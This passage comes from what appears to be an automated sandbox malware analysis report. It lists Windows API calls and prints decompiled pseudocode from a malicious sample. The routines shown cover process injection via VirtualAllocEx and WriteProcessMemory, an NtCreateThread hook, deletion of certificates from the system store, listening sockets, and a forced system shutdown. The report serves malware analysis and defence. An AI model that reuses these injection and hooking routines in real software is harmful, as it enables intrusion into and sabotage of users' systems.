            • SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00415BD0
            • RemoveDirectoryW.KERNEL32(?), ref: 00415BD7
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
            • String ID:
            • API String ID: 765042924-0
            • Opcode ID: df1443738ebbb253cdfe07bb5106216db9786ad3c9c4d10b138312695f1abf6e
            • Instruction ID: c1fa861f355615f5f333406c580445452ecd694818c19d369529a4bc7d080bd7
            • Opcode Fuzzy Hash: df1443738ebbb253cdfe07bb5106216db9786ad3c9c4d10b138312695f1abf6e
            • Instruction Fuzzy Hash: 34119832008608DAC320EB64DD4DBEB77ECAFC5314F04466FF995D6190EB78A585875D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CertOpenSystemStoreW.CRYPT32(00000000,00402014), ref: 0040A168
            • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040A181
            • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,00000001,004042EB), ref: 0040A18C
            • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040A194
            • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040A1A0
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
            • String ID:
            • API String ID: 1842529175-0
            • Opcode ID: 2cca78b7e4634e749ecf60a41a80895195da117047974f04266fae40cad096fd
            • Instruction ID: 66c929fe9e79bdc831e492437d17932779c5f8940c9b27c0b8a5836c14af7b05
            • Opcode Fuzzy Hash: 2cca78b7e4634e749ecf60a41a80895195da117047974f04266fae40cad096fd
            • Instruction Fuzzy Hash: 05F0A0322813147AD62117256E18FA7776C9B92B91F040133FA84F66A08E388851857E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00414E5F(void* __eax, void* _a4) {
            				char _v5;
            				signed int _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				long _v24;
            				void* _t35;
            				void** _t39;
            				void* _t41;
            				intOrPtr* _t42;
            				int _t43;
            				long _t45;
            				void* _t46;
            				SIZE_T* _t47;
            				signed int _t49;
            				void** _t52;
            				void* _t54;
            				void* _t55;
            				void* _t60;
            				intOrPtr _t61;
            				intOrPtr _t62;
            				unsigned int _t64;
            
            				_t55 = __eax;
            				_t1 = _t55 + 0x3c; // 0xd0
            				_t60 =  *_t1 + __eax;
            				_t45 =  *(_t60 + 0x50);
            				_v24 = _t45;
            				_v5 = 0;
            				if(IsBadReadPtr(__eax, _t45) == 0) {
            					_t35 = VirtualAllocEx(_a4, 0, _t45, 0x3000, 0x40);
            					_v12 = _t35;
            					__eflags = _t35;
            					if(__eflags == 0) {
            						L17:
            						return _v12;
            					}
            					_t46 = E0041046B(__eflags, _t55, _t45);
            					_t47 = 0;
            					__eflags = _t46;
            					if(_t46 == 0) {
            						L16:
            						VirtualFreeEx(_a4, _v12, 0, 0x8000);
            						_t30 =  &_v12;
            						 *_t30 = _v12 & 0x00000000;
            						__eflags =  *_t30;
            						goto L17;
            					}
            					_t7 = _t60 + 0xa0; // 0x170
            					_t39 = _t7;
            					__eflags = _t39[1];
            					if(_t39[1] <= 0) {
            						L15:
            						E00410418(_t46);
            						__eflags = _v5;
            						if(_v5 != 0) {
            							goto L17;
            						}
            						goto L16;
            					}
            					_t41 =  *_t39;
            					__eflags = _t41;
            					if(_t41 <= 0) {
            						goto L15;
            					}
            					_t61 =  *((intOrPtr*)(_t60 + 0x34));
            					_t54 = _v12 - _t61;
            					_v20 = _t55 - _t61;
            					_t42 = _t41 + _t46;
            					while(1) {
            						__eflags =  *_t42 - _t47;
            						if( *_t42 == _t47) {
            							break;
            						}
            						_t62 =  *((intOrPtr*)(_t42 + 4));
            						__eflags = _t62 - 8;
            						if(_t62 < 8) {
            							L12:
            							_t42 = _t42 +  *((intOrPtr*)(_t42 + 4));
            							_t47 = 0;
            							__eflags = 0;
            							continue;
            						}
            						_t64 = _t62 + 0xfffffff8 >> 1;
            						__eflags = _t64;
            						_v16 = _t47;
            						if(_t64 == 0) {
            							goto L12;
            						} else {
            							goto L9;
            						}
            						do {
            							L9:
            							_t49 =  *(_t42 + 8 + _v16 * 2) & 0x0000ffff;
            							__eflags = _t49;
            							if(_t49 > 0) {
            								_t52 = (_t49 & 0x00000fff) +  *_t42 + _t46;
            								 *_t52 =  *_t52 + _t54 - _v20;
            								__eflags =  *_t52;
            							}
            							_v16 = _v16 + 1;
            							__eflags = _v16 - _t64;
            						} while (_v16 < _t64);
            						goto L12;
            					}
            					_t43 = WriteProcessMemory(_a4, _v12, _t46, _v24, _t47);
            					__eflags = _t43;
            					_t26 =  &_v5;
            					 *_t26 = _t43 != 0;
            					__eflags =  *_t26;
            					goto L15;
            				}
            				return 0;
            			}

            APIs
            • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00414E7B
            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,00000000), ref: 00414E99
            • WriteProcessMemory.KERNEL32(?,?,00000000,00400000,00000000,00400000,?,?,?,00000000), ref: 00414F2B
            • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,?,00000000), ref: 00414F50
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Virtual$AllocFreeMemoryProcessReadWrite
            • String ID:
            • API String ID: 1273498236-0
            • Opcode ID: a0383efb89150ba53d3786485c5f069575b38c586a09f5cd8a91de44163d146c
            • Instruction ID: 8ce53615bc7d042a47763ce9ea18e9355b32a8ece3c15be76da7397c61c290fe
            • Opcode Fuzzy Hash: a0383efb89150ba53d3786485c5f069575b38c586a09f5cd8a91de44163d146c
            • Instruction Fuzzy Hash: E531A131A00209AFCF109F64CD84BEEBBB5FF85705F05806AE505AB3A0D7749D96CB58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • socket.WS2_32(00000000,00000001,00000006), ref: 004133B5
            • bind.WS2_32(00000000,?,-0000001D), ref: 004133D5
            • listen.WS2_32(00000000,?), ref: 004133E4
            • closesocket.WS2_32(00000000), ref: 004133EF
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: bindclosesocketlistensocket
            • String ID:
            • API String ID: 952684215-0
            • Opcode ID: 7df32db1469fb2c41621e77cd42a14e17b9e721c2988f9feb97ec661e2791ffe
            • Instruction ID: ee6a3e9d37879644315cfa66927fc6425b8b50155a795341b2f372dfe766c62d
            • Opcode Fuzzy Hash: 7df32db1469fb2c41621e77cd42a14e17b9e721c2988f9feb97ec661e2791ffe
            • Instruction Fuzzy Hash: B3F037326002116BE3201F399D49A6F29A99B91B72B540729FD71D51E0DB3C85D19529
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E0040F964(void* __ebx) {
            				void* __ecx;
            				signed char _t8;
            				unsigned int _t11;
            				void* _t18;
            
            				_t8 =  *0x41ae90; // 0x0
            				_t19 = _t8 & 0x00000010;
            				if((_t8 & 0x00000010) == 0) {
            					__eflags = _t8 & 0x00000008;
            					if(__eflags != 0) {
            						E00405A73(__ebx, _t18, __eflags);
            						_t8 =  *0x41ae90; // 0x0
            					}
            					__eflags = _t8 & 0x00000003;
            					if((_t8 & 0x00000003) == 0) {
            						__eflags = _t8 & 0x00000004;
            						if((_t8 & 0x00000004) != 0) {
            							return ExitWindowsEx(0x14, 0x80000000);
            						}
            						return _t8;
            					} else {
            						E00411ADE(L"SeShutdownPrivilege");
            						_t11 =  *0x41ae90; // 0x0
            						__eflags = 0;
            						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t11 >> 0x00000001 & 0x00000001, 0x80000000);
            						return 0;
            					}
            				} else {
            					return E00404191(_t19);
            				}
            			}

            APIs
            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040F9A8
              • Part of subcall function 00404191: ExitWindowsEx.USER32(00000014,80000000), ref: 004041BF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ExitInitiateShutdownSystemWindows
            • String ID: SeShutdownPrivilege
            • API String ID: 1562069236-3733053543
            • Opcode ID: d6e8d649078f41751fd313dac7db1d794ec24055c939ba7fd8d45512392503e3
            • Instruction ID: 0ab3187430107409b3e3823c907dd5f32d3baeccaadc67a6e8e9949e7d8abc96
            • Opcode Fuzzy Hash: d6e8d649078f41751fd313dac7db1d794ec24055c939ba7fd8d45512392503e3
            • Instruction Fuzzy Hash: 12F0E5F22517407CFD255764AC0AFF61B18DB01794F28407EFAC1B59F1CAB90862A62D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404984(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
            				void _v28;
            				long _v32;
            				intOrPtr _v40;
            				void* __edi;
            				void* _t21;
            				void* _t28;
            				signed int _t31;
            				void* _t35;
            				void* _t36;
            				void* _t39;
            				void* _t41;
            				void* _t43;
            
            				_t43 = __esi;
            				_t39 = __edx;
            				_t36 = __ecx;
            				_t21 = E00403E39();
            				_t41 = _a16;
            				if(_t21 != 0 && NtQueryInformationProcess(_t41, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E00411A8A(_v28) == 0)) {
            					_t35 = E00403C5D(_t36, _t39, _v28);
            					_t52 = _t35;
            					if(_t35 != 0) {
            						_t28 = E00403D3B(_t36, _t41, _t43, _t52, _t35, 0);
            						if(_t28 != 0) {
            							_t31 = _t28 -  *0x41a2a4 + E00404356;
            							if(( *0x41a290 & 0x00000008) != 0) {
            								_t31 = _t31 ^  *(_a24 + 0xb0);
            							}
            							 *(_a24 + 0xb0) = _t31;
            						}
            						CloseHandle(_t35);
            					}
            				}
            				E00403E2A();
            				return NtCreateThread(_a4, _a8, _a12, _t41, _a20, _a24, _a28, _a32);
            			}

            APIs
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 004049AA
            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404A11
              • Part of subcall function 00411A8A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00411A97
              • Part of subcall function 00411A8A: Thread32First.KERNEL32 ref: 00411AB1
              • Part of subcall function 00411A8A: CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 00411AD0
            • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00404A32
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
            • String ID:
            • API String ID: 3154080929-0
            • Opcode ID: db9e9335c3ab796a3bab87d87c3c09b8ac9909ba71e26eacda1689905936860a
            • Instruction ID: e8c7a4ba2693b920a1a175eea69e4884c44c79e60a7ccf769da377a827864300
            • Opcode Fuzzy Hash: db9e9335c3ab796a3bab87d87c3c09b8ac9909ba71e26eacda1689905936860a
            • Instruction Fuzzy Hash: EC11AF71200245ABDB119F61DC45BAB3BA9FF88308F04413ABE44B52F1C73AD925DB5E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • socket.WS2_32(00000000,00000002,00000011), ref: 004136A5
            • bind.WS2_32(00000000,00000017,-0000001D), ref: 004136C5
            • closesocket.WS2_32(00000000), ref: 004136D0
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: bindclosesocketsocket
            • String ID:
            • API String ID: 1873677229-0
            • Opcode ID: 6f8a6aea4d618069bb627f77538a177d2f0e7e108d0e45a90daac578fff26911
            • Instruction ID: 1d42b488269b78db975e02c42e92392a9ab9d72b71aab3b77a94dcd15e7a66f8
            • Opcode Fuzzy Hash: 6f8a6aea4d618069bb627f77538a177d2f0e7e108d0e45a90daac578fff26911
            • Instruction Fuzzy Hash: FBE048367005106BE2201F39AD4EA6F25E99B85B727584719BDB1D21E1D77C88C19124
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404191(void* __eflags) {
            				signed int _v124;
            
            				if(E00406140( &_v124) == 0) {
            					return 0;
            				} else {
            					_v124 = _v124 | 0x00000020;
            					 *0x41a290 =  *0x41a290 | 0x00000008;
            					E00406198( &_v124);
            					ExitWindowsEx(0x14, 0x80000000);
            					return 1;
            				}
            			}

            APIs
              • Part of subcall function 00406140: CreateMutexW.KERNEL32(0041A2C8,00000000,0041A958,?,?,0040F1FD,?,?,?,743C152E,00000002), ref: 00406166
            • ExitWindowsEx.USER32(00000014,80000000), ref: 004041BF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CreateExitMutexWindows
            • String ID:
            • API String ID: 2837814579-3916222277
            • Opcode ID: d05c7869634e9a3af85e3a807b90b6ea6e4016e86638a16ae63608f77c9e8919
            • Instruction ID: c7198e515e8023b75db1f9341cef18ce9866ac8149266297d816e8496cc45bbf
            • Opcode Fuzzy Hash: d05c7869634e9a3af85e3a807b90b6ea6e4016e86638a16ae63608f77c9e8919
            • Instruction Fuzzy Hash: 46E08C308042085ADE10EFB19C0AAC97BA89B04709F2005A9AA12FB192D7799065CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E00406940(signed int __edx, intOrPtr _a4) {
            				signed int _v12;
            				int _v16;
            				void* _v20;
            				signed int _v24;
            				char _v28;
            				signed int _v32;
            				int _v36;
            				int _v40;
            				int _v44;
            				intOrPtr _v48;
            				signed int _v52;
            				signed int _v56;
            				intOrPtr _v66;
            				intOrPtr _v70;
            				char _v72;
            				struct _SYSTEMTIME _v88;
            				char _v104;
            				char _v176;
            				short _v280;
            				void* __ebx;
            				void* __esi;
            				signed int _t111;
            				signed int _t115;
            				signed int _t116;
            				signed int _t117;
            				signed int _t124;
            				signed short _t126;
            				signed short _t127;
            				signed short _t135;
            				signed short _t140;
            				signed short _t145;
            				signed char _t150;
            				signed int _t154;
            				signed int _t164;
            				signed int _t165;
            				intOrPtr _t166;
            				signed int _t174;
            				signed int _t178;
            				signed int _t179;
            				signed int _t185;
            				void* _t186;
            				signed int _t187;
            				int _t190;
            				signed int _t192;
            				signed short _t199;
            				signed int _t218;
            				signed int _t219;
            				intOrPtr _t220;
            
            				_t216 = __edx;
            				_t220 = _a4;
            				_t110 =  *((intOrPtr*)(_t220 + 0x30));
            				if( *((intOrPtr*)(_t220 + 0x30)) != 0) {
            					_t111 = E00416037( &_v12, __edx, __eflags, _t110, 0x4e27, 0x10000000);
            					 *(_t220 + 0x2c) =  *(_t220 + 0x2c) & 0x00000000;
            					 *(_t220 + 0x28) =  *(_t220 + 0x28) & 0x00000000;
            					_t219 = _t111;
            					_v56 = _t219;
            					__eflags = _t219;
            					if(_t219 == 0) {
            						L53:
            						E00410418(_v56);
            						__eflags = 0 -  *(_t220 + 0x2c);
            						asm("sbb eax, eax");
            						return  ~0x00000000;
            					}
            					_t115 = _v12;
            					__eflags = _t115 - 0x10;
            					if(_t115 <= 0x10) {
            						goto L53;
            					}
            					__eflags =  *((char*)(_t220 + 0x14)) - 1;
            					_v16 = 1;
            					_t116 = _t115 + _t219;
            					__eflags = _t116;
            					_v24 = ((0 |  *((char*)(_t220 + 0x14)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
            					_v12 = _t116;
            					while(1) {
            						_t117 =  *(_t219 + 2) & 0x0000ffff;
            						__eflags = _t117 - 0x10;
            						if(_t117 < 0x10) {
            							goto L53;
            						}
            						_t199 =  *(_t219 + 4) & 0x0000ffff;
            						__eflags = _t199 - _t117;
            						if(_t199 >= _t117) {
            							goto L53;
            						}
            						__eflags =  *(_t219 + 6) - _t117;
            						if( *(_t219 + 6) >= _t117) {
            							goto L53;
            						}
            						__eflags =  *(_t219 + 8) - _t117;
            						if( *(_t219 + 8) >= _t117) {
            							goto L53;
            						}
            						__eflags =  *(_t219 + 0xa) - _t117;
            						if( *(_t219 + 0xa) >= _t117) {
            							goto L53;
            						}
            						__eflags =  *(_t219 + 0xc) - _t117;
            						if( *(_t219 + 0xc) >= _t117) {
            							goto L53;
            						}
            						__eflags =  *(_t219 + 0xe) - _t117;
            						if( *(_t219 + 0xe) >= _t117) {
            							goto L53;
            						}
            						_t201 = (_t199 & 0x0000ffff) + _t219;
            						__eflags = ( *_t219 & _v24) - _v24;
            						if(( *_t219 & _v24) != _v24) {
            							L46:
            							_t219 = _t219 + ( *(_t219 + 2) & 0x0000ffff);
            							_t87 = _t219 + 0x10; // 0x10
            							__eflags = _t87 - _v12;
            							if(_t87 > _v12) {
            								goto L53;
            							}
            							__eflags = ( *(_t219 + 2) & 0x0000ffff) + _t219 - _v12;
            							if(( *(_t219 + 2) & 0x0000ffff) + _t219 > _v12) {
            								goto L53;
            							}
            							_v16 = _v16 + 1;
            							continue;
            						}
            						_t124 = E00406638(_t201,  *((intOrPtr*)(_t220 + 4)),  *((intOrPtr*)(_t220 + 8)));
            						__eflags = _t124;
            						if(_t124 == 0) {
            							goto L46;
            						}
            						_t125 =  *(_t220 + 0x34);
            						_t190 = 0;
            						__eflags =  *(_t220 + 0x34);
            						if(__eflags == 0) {
            							L16:
            							_t126 =  *(_t219 + 8) & 0x0000ffff;
            							__eflags = _t126 - _t190;
            							if(_t126 <= _t190) {
            								L18:
            								_t127 =  *(_t219 + 0xa) & 0x0000ffff;
            								__eflags = _t127 - _t190;
            								if(_t127 <= _t190) {
            									L20:
            									__eflags =  *_t219 & 0x00000010;
            									if(( *_t219 & 0x00000010) == 0) {
            										L29:
            										E004104CB( &_v52,  &_v52, _t190, 0x1c);
            										_v52 =  *_t219 & 0x0000ffff;
            										_v48 = E00410882(( *(_t219 + 4) & 0x0000ffff) + _t219 | 0xffffffff, ( *(_t219 + 4) & 0x0000ffff) + _t219);
            										_t135 =  *(_t219 + 6) & 0x0000ffff;
            										__eflags = _t135 - _t190;
            										if(_t135 != _t190) {
            											__eflags = (_t135 & 0x0000ffff) + _t219 | 0xffffffff;
            											_v44 = E00410882((_t135 & 0x0000ffff) + _t219 | 0xffffffff, (_t135 & 0x0000ffff) + _t219);
            										} else {
            											_v44 = _t190;
            										}
            										_t140 =  *(_t219 + 0xc) & 0x0000ffff;
            										__eflags = _t140 - _t190;
            										if(_t140 != _t190) {
            											__eflags = (_t140 & 0x0000ffff) + _t219 | 0xffffffff;
            											_v40 = E00410882((_t140 & 0x0000ffff) + _t219 | 0xffffffff, (_t140 & 0x0000ffff) + _t219);
            										} else {
            											_v40 = _t190;
            										}
            										_t145 =  *(_t219 + 0xe) & 0x0000ffff;
            										__eflags = _t145 - _t190;
            										if(_t145 != _t190) {
            											__eflags = (_t145 & 0x0000ffff) + _t219 | 0xffffffff;
            											_v36 = E00410882((_t145 & 0x0000ffff) + _t219 | 0xffffffff, (_t145 & 0x0000ffff) + _t219);
            										} else {
            											_v36 = _t190;
            										}
            										_t150 =  *_t219 & 0x0000ffff;
            										__eflags = _t150 & 0x00000003;
            										if((_t150 & 0x00000003) != 0) {
            											E004077A6( *(_t220 + 0x2c),  *(_t220 + 0x28));
            											 *(_t220 + 0x2c) = _t190;
            											_t154 = E0041046B(__eflags,  &_v52, 0x1c);
            											 *(_t220 + 0x28) = _t154;
            											__eflags = _t154 - _t190;
            											if(_t154 == _t190) {
            												E0040777D( &_v52);
            												_t220 = _a4;
            											} else {
            												 *(_t220 + 0x2c) =  *(_t220 + 0x2c) + 1;
            											}
            											goto L53;
            										} else {
            											__eflags = _t150 & 0x0000000c;
            											if(__eflags == 0) {
            												E0040777D( &_v52);
            												L45:
            												_t220 = _a4;
            												goto L46;
            											}
            											_t192 = E00416037( &_v28, _t216, __eflags,  *((intOrPtr*)(_t220 + 0x30)), _v16, 0x40000000);
            											_v32 = _t192;
            											__eflags = _t192;
            											if(_t192 == 0) {
            												L52:
            												E00410418(_t192);
            												E0040777D( &_v52);
            												_t220 = _a4;
            												E004077A6( *(_t220 + 0x2c),  *((intOrPtr*)(_a4 + 0x28)));
            												_t106 = _t220 + 0x2c;
            												 *_t106 =  *(_t220 + 0x2c) & 0x00000000;
            												__eflags =  *_t106;
            												goto L53;
            											}
            											_t164 = E0041670D(_t192, _v28);
            											__eflags = _t164;
            											if(_t164 == 0) {
            												goto L52;
            											}
            											_t224 = _t220 + 0x28;
            											_t165 = E004103A8(( *(_t220 + 0x2c) + 1) * 0x1c, _t220 + 0x28);
            											__eflags = _t165;
            											if(_t165 == 0) {
            												goto L52;
            											}
            											_t166 = _a4;
            											_t218 =  *(_t166 + 0x2c);
            											_t216 = _t218 + 1;
            											 *(_t166 + 0x2c) = _t218 + 1;
            											E00410454(_t218 * 0x1c +  *_t224,  &_v52, 0x1c);
            											goto L45;
            										}
            									}
            									__eflags =  *(_t219 + 0xc) - _t190;
            									if( *(_t219 + 0xc) <= _t190) {
            										goto L29;
            									}
            									E00403F5F( &_v176, _t201, 1,  &_v280);
            									_t174 = E00411780( &_v104, ( *(_t219 + 0xc) & 0x0000ffff) + _t219, E00411086(( *(_t219 + 0xc) & 0x0000ffff) + _t219));
            									__eflags = _t174;
            									if(_t174 == 0) {
            										goto L46;
            									}
            									E00410CE3( &_v176,  &_v104);
            									_v20 = 0x80000001;
            									_t178 = RegOpenKeyExW(0x80000001,  &_v280, _t190, 1,  &_v20);
            									__eflags = _t178;
            									if(_t178 != 0) {
            										_t179 = _t178 | 0xffffffff;
            										__eflags = _t179;
            									} else {
            										_t179 = E0041449E( &_v20,  &_v176, _t190,  &_v72, 0x10);
            										_t220 = _a4;
            										_t190 = 0;
            									}
            									__eflags = _t179 - 0x10;
            									if(_t179 == 0x10) {
            										GetLocalTime( &_v88);
            										__eflags = _v66 - _v88.wDay;
            										if(_v66 != _v88.wDay) {
            											goto L29;
            										}
            										__eflags = _v70 - _v88.wMonth;
            										if(_v70 == _v88.wMonth) {
            											goto L46;
            										}
            									}
            									goto L29;
            								}
            								_t201 = (_t127 & 0x0000ffff) + _t219;
            								_t185 = E00406670((_t127 & 0x0000ffff) + _t219,  *((intOrPtr*)(_t220 + 0x20)),  *((intOrPtr*)(_t220 + 0x24)));
            								__eflags = _t185;
            								if(_t185 == 0) {
            									goto L46;
            								}
            								goto L20;
            							}
            							_t201 = (_t126 & 0x0000ffff) + _t219;
            							_t186 = E00406670((_t126 & 0x0000ffff) + _t219,  *((intOrPtr*)(_t220 + 0x20)),  *((intOrPtr*)(_t220 + 0x24)));
            							__eflags = _t186 - 1;
            							if(_t186 == 1) {
            								goto L46;
            							}
            							goto L18;
            						}
            						_t187 = E004068DC(_t201, _t216, __eflags, 4, _t125,  *((intOrPtr*)(_t220 + 4)),  *((intOrPtr*)(_t220 + 8)));
            						__eflags = _t187;
            						if(_t187 != 0) {
            							goto L46;
            						}
            						goto L16;
            					}
            					goto L53;
            				}
            				return 0;
            			}

            0x00406940
            0x0040694b
            0x0040694e
            0x00406954
            0x0040696b
            0x00406970
            0x00406974
            0x00406978
            0x0040697a
            0x0040697d
            0x0040697f
            0x00406cbd
            0x00406cc0
            0x00406cc7
            0x00406cca
            0x00000000
            0x00406ccc
            0x00406985
            0x00406988
            0x0040698b
            0x00000000
            0x00000000
            0x00406993
            0x00406997
            0x004069ab
            0x004069ab
            0x004069ad
            0x004069b0
            0x004069b3
            0x004069b3
            0x004069b7
            0x004069bb
            0x00000000
            0x00000000
            0x004069c1
            0x004069c5
            0x004069c8
            0x00000000
            0x00000000
            0x004069ce
            0x004069d2
            0x00000000
            0x00000000
            0x004069d8
            0x004069dc
            0x00000000
            0x00000000
            0x004069e2
            0x004069e6
            0x00000000
            0x00000000
            0x004069ec
            0x004069f0
            0x00000000
            0x00000000
            0x004069f6
            0x004069fa
            0x00000000
            0x00000000
            0x00406a0a
            0x00406a0c
            0x00406a10
            0x00406c45
            0x00406c49
            0x00406c4b
            0x00406c4e
            0x00406c51
            0x00000000
            0x00000000
            0x00406c59
            0x00406c5c
            0x00000000
            0x00000000
            0x00406c5e
            0x00000000
            0x00406c5e
            0x00406a1c
            0x00406a21
            0x00406a23
            0x00000000
            0x00000000
            0x00406a29
            0x00406a2c
            0x00406a2e
            0x00406a30
            0x00406a48
            0x00406a48
            0x00406a4c
            0x00406a4f
            0x00406a69
            0x00406a69
            0x00406a6d
            0x00406a70
            0x00406a8a
            0x00406a8a
            0x00406a8d
            0x00406b46
            0x00406b4d
            0x00406b55
            0x00406b67
            0x00406b6a
            0x00406b6e
            0x00406b71
            0x00406b7e
            0x00406b86
            0x00406b73
            0x00406b73
            0x00406b73
            0x00406b89
            0x00406b8d
            0x00406b90
            0x00406b9d
            0x00406ba5
            0x00406b92
            0x00406b92
            0x00406b92
            0x00406ba8
            0x00406bac
            0x00406baf
            0x00406bbc
            0x00406bc4
            0x00406bb1
            0x00406bb1
            0x00406bb1
            0x00406bc7
            0x00406bca
            0x00406bcc
            0x00406c6c
            0x00406c77
            0x00406c7a
            0x00406c7f
            0x00406c82
            0x00406c84
            0x00406c8e
            0x00406c93
            0x00406c86
            0x00406c86
            0x00406c86
            0x00000000
            0x00406bd2
            0x00406bd2
            0x00406bd4
            0x00406c3d
            0x00406c42
            0x00406c42
            0x00000000
            0x00406c42
            0x00406be9
            0x00406beb
            0x00406bee
            0x00406bf0
            0x00406c98
            0x00406c99
            0x00406ca1
            0x00406ca9
            0x00406cb4
            0x00406cb9
            0x00406cb9
            0x00406cb9
            0x00000000
            0x00406cb9
            0x00406bfb
            0x00406c00
            0x00406c02
            0x00000000
            0x00000000
            0x00406c0f
            0x00406c12
            0x00406c17
            0x00406c19
            0x00000000
            0x00000000
            0x00406c1b
            0x00406c1e
            0x00406c28
            0x00406c29
            0x00406c33
            0x00000000
            0x00406c33
            0x00406bcc
            0x00406a93
            0x00406a97
            0x00000000
            0x00000000
            0x00406aac
            0x00406ac2
            0x00406ac7
            0x00406ac9
            0x00000000
            0x00000000
            0x00406ad9
            0x00406af2
            0x00406af5
            0x00406afb
            0x00406afd
            0x00406b1c
            0x00406b1c
            0x00406aff
            0x00406b10
            0x00406b15
            0x00406b18
            0x00406b18
            0x00406b1f
            0x00406b22
            0x00406b28
            0x00406b32
            0x00406b36
            0x00000000
            0x00000000
            0x00406b3c
            0x00406b40
            0x00000000
            0x00000000
            0x00406b40
            0x00000000
            0x00406b22
            0x00406a7b
            0x00406a7d
            0x00406a82
            0x00406a84
            0x00000000
            0x00000000
            0x00000000
            0x00406a84
            0x00406a5a
            0x00406a5c
            0x00406a61
            0x00406a63
            0x00000000
            0x00000000
            0x00000000
            0x00406a63
            0x00406a3b
            0x00406a40
            0x00406a42
            0x00000000
            0x00000000
            0x00000000
            0x00406a42
            0x00000000
            0x004069b3
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
